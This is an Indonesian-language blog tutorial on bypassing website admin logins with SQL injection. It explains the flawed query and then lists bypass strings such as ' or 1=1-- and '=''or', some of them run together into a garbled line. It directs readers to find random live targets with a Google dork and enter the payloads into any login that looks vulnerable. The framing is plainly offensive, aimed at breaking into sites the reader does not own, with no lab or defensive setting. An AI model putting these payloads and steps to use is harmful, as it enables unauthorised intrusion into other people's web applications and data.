» » Query String Bypass Admin Login

Query String Bypass Admin Login

09:00


Nah sekarang saya akan sedikit share mengenai hak hek hok nih ^_^ haha
Kali ini saya akan share mengenai "Query String Bypass Admin Login".
Query String Bypass Admin Login adalah suatu perintah sql dimana system akan mengeksekusi menjadi query dari user:pass administrator untuk masuk ke halaman admin panel.
query itu sendiri ' or 1=1 limit 1 -- -+ <~

 Hal tersebut terjadi karena form login tersebut dicek dengan menggunakan perintah :
"SELECT * FROM user WHERE username = '$username'  AND password = '$password'"
Sehingga jika variabel username diberi input (' or 1=1--), maka query SQLnya akan menjadi
"SELECT * FROM user WHERE username = '' or 1=1--'  AND password = ''"

                      
Pernyataan 1=1 akan membuat query tersebut selalu mengembalikan nilai TRUE untuk pernyataan tersebut. Karakter double sign setelah username akan membuat pemeriksaan terhadap password akan diabaikan sehingga penyusup tidak perlu memasukan password.Selain dengan String tersebut, beberapa String berikut juga biasa digunakan untuk mengecek adakah celah keamanan pada suatu form login. String – string tersebut adalah:
' or 1=1--                        " or 1=1—or 0=0 --                                         ' or 1=1 #" or 1=1 #                       
or 0=0 #' or 'x' = 'x                       " or "x" = "x') or ('x' = 'x                     ' or 1=1--" or 1=1--                        
or 1=1--" or a=a-- 

 Lebih jelas kita langsung cekidot yu ^_^.

Pertama seperti biasa kita akan memanfaatkan google ^_^.

#Dork : inurl:admin/index.php  (dork kembangin)

Langsung saja pilih link yang sekiranya vuln ^_^.
Tampilan dengan contoh saya bisa berbeda ,
Contoh punya saya :


Nah pada kotak user dan passwordnya masukan query : ' or 1=1 limit 1 -- -+ <~ 
atau bisa juga query: '=''or'
Jika vuln , secara otomatis jika kita klik login maka akan menuju kehalaman admin panelnya ^_^ .


Nah sudah agak faham kan ? ^_^ .
Memang pengertian SQL sangatlah panjang , saya hanya bisa menerangkannya sampai disini ^_^ Silahkan download pengertian lebih rincinya lagi ^_^.
Terimakasi dan sampai jumpa ~~>> salam IT .


BAGIKAN:

Subscribe To Get Best Articles!

Jika menurut kalian artikel di blog ini berkualitas dan bermanfaat, silahkan berlangganan artikel terbaru melalui pesan masuk email anda secara gratis.

1 comment:

" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "

Subscribe to: Post Comments ( Atom)